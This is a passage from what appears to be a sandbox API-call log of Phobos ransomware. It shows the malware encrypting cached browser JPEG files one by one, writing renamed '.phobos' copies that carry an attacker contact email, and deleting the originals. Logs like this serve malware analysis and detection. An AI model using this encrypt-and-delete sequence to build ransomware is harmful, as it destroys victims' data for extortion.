hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0183.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeU5U[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeeu5u[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0183.766] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1961) returned 1 [0183.766] CloseHandle (hObject=0xb8) returned 1 [0183.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeU5U[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeeu5u[1].jpg")) returned 0x2020 [0183.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeU5U[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeeu5u[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeU5U[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeeu5u[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0183.766] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.766] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeU5U[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeeu5u[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0183.767] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0183.767] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.767] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7a9, lpOverlapped=0x0) returned 1 [0183.781] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7b0, dwBufLen=0x7b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7b0) returned 1 [0183.782] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x7b0, lpOverlapped=0x0) returned 1 [0183.783] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0183.783] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.783] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0183.783] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0183.783] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0183.783] CryptDestroyKey (hKey=0xa327e8) returned 1 [0183.783] CloseHandle (hObject=0xb8) returned 1 [0183.783] CloseHandle (hObject=0x140) returned 1 [0183.783] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeU5U[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeeu5u[1].jpg")) returned 1 [0183.784] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0183.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf306[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef306[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0183.785] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2159) returned 1 [0183.785] CloseHandle (hObject=0x140) returned 1 [0183.785] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf306[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef306[1].jpg")) returned 0x2020 [0183.785] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf306[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef306[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf306[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef306[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0183.785] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.785] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf306[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef306[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0183.786] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0183.786] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.786] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x86f, lpOverlapped=0x0) returned 1 [0183.859] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x870, dwBufLen=0x870 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x870) returned 1 [0183.859] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x870, lpOverlapped=0x0) returned 1 [0183.860] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0183.860] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.860] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0183.860] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0183.860] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0183.860] CryptDestroyKey (hKey=0xa327e8) returned 1 [0183.860] CloseHandle (hObject=0x140) returned 1 [0183.860] CloseHandle (hObject=0xb8) returned 1 [0183.860] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf306[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef306[1].jpg")) returned 1 [0183.861] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0183.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBbH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbbh[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0183.861] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=14432) returned 1 [0183.861] CloseHandle (hObject=0xb8) returned 1 [0183.861] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBbH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbbh[1].jpg")) returned 0x2020 [0183.862] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBbH[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbbh[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBbH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbbh[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0183.862] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.862] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBbH[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbbh[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0183.862] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0183.862] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.862] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3860, lpOverlapped=0x0) returned 1 [0184.052] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3870, dwBufLen=0x3870 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3870) returned 1 [0184.052] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3870, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3870, lpOverlapped=0x0) returned 1 [0184.054] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0184.054] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.054] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0184.054] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.054] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0184.054] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.054] CloseHandle (hObject=0xb8) returned 1 [0184.054] CloseHandle (hObject=0x140) returned 1 [0184.054] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBbH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbbh[1].jpg")) returned 1 [0184.055] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgsz3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegsz3[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.056] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2297) returned 1 [0184.056] CloseHandle (hObject=0x140) returned 1 [0184.056] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgsz3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegsz3[1].jpg")) returned 0x2020 [0184.057] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgsz3[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegsz3[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgsz3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegsz3[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.057] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.060] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgsz3[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegsz3[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.061] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.061] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.061] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8f9, lpOverlapped=0x0) returned 1 [0184.173] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x900, dwBufLen=0x900 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x900) returned 1 [0184.173] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x900, lpOverlapped=0x0) returned 1 [0184.174] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0184.174] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.174] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0184.174] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.174] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0184.174] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.174] CloseHandle (hObject=0x140) returned 1 [0184.174] CloseHandle (hObject=0xb8) returned 1 [0184.174] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgsz3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegsz3[1].jpg")) returned 1 [0184.175] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgTxB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegtxb[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.176] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2487) returned 1 [0184.176] CloseHandle (hObject=0xb8) returned 1 [0184.176] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgTxB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegtxb[1].jpg")) returned 0x2020 [0184.176] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgTxB[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegtxb[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgTxB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegtxb[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.176] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.176] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgTxB[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegtxb[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.177] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, 